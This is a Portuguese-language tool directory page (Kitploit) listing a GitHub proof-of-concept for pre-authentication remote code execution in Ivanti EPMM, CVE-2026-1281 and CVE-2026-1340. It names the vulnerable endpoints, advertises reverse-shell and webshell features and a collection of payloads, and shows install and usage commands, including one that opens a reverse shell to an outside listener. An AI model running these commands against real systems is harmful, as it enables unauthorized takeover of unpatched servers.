Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — Prova de Conceito para CVE-2026-1281 e CVE-2026-1340 - RCE Pré-Autenticação no Ivanti EPMM via Expansão Aritmética do Bash | Kitploit
Ferramentas/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Prova de Conceito para CVE-2026-1281 e CVE-2026-1340 - RCE Pré-Autenticação no Ivanti EPMM via Expansão Aritmética do Bash

Ver Repositório
61há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ AVISO: Este PoC é fornecido apenas para fins educacionais e de pesquisa em segurança. O uso sem autorização explícita é ilegal.

🎯 Descrição

Proof of Concept (PoC) completo para a exploração das vulnerabilidades CVE-2026-1281 e CVE-2026-1340 que afetam o Ivanti Endpoint Manager Mobile (EPMM). Essas vulnerabilidades permitem execução remota de código arbitrário (RCE) sem autenticação por meio de um mecanismo de Bash Arithmetic Expansion.

Vulnerabilidades

  • CVE-2026-1281 : Injeção de código no endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Injeção de código no endpoint
/mifs/c/aftstore/fob/
  • Pontuação CVSS : 9.8 (Crítica)
  • Exploração : Ativa in-the-wild (Zero-Day)
  • 🚀 Funcionalidades

    • ✅ Framework de validação automatizado (8 testes)
    • ✅ Exploração Pre-Auth RCE
    • ✅ Reverse shell automático
    • ✅ Implantação de webshell
    • ✅ 50+ payloads prontos para uso
    • ✅ Scripts de detecção para Blue Team
    • ✅ Documentação completa

    📦 Instalação

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 Uso Rápido

    root@kitploit:~
    # Teste de vulnerabilidade
    python3 exploit.py -t https://target.com -c
    
    # Validação RCE
    python3 exploit.py -t https://target.com --test-rce
    
    # Reverse shell
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 Documentação

    • README completo - Documentação técnica detalhada
    • Guia de uso - Guia passo a passo
    • Payloads - Coleção de 50+ payloads
    • Guia Red Team - Cenários operacionais

    🔗 Referências

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs Analysis
    • CVE-2026-1281
    • CVE-2026-1340

    👤 Autor

    Mehdi Le Deaut - Consultor de Cibersegurança | Especialista em Red Team

    LinkedIn

    ⚖️ Licença

    Este projeto está licenciado sob a MIT - veja o arquivo LICENSE para mais detalhes.

    🙏 Agradecimentos

    • CERT-FR pelo alerta rápido
    • Watchtowr Labs pela análise técnica
    • A comunidade de cibersegurança
    Baixar ferramenta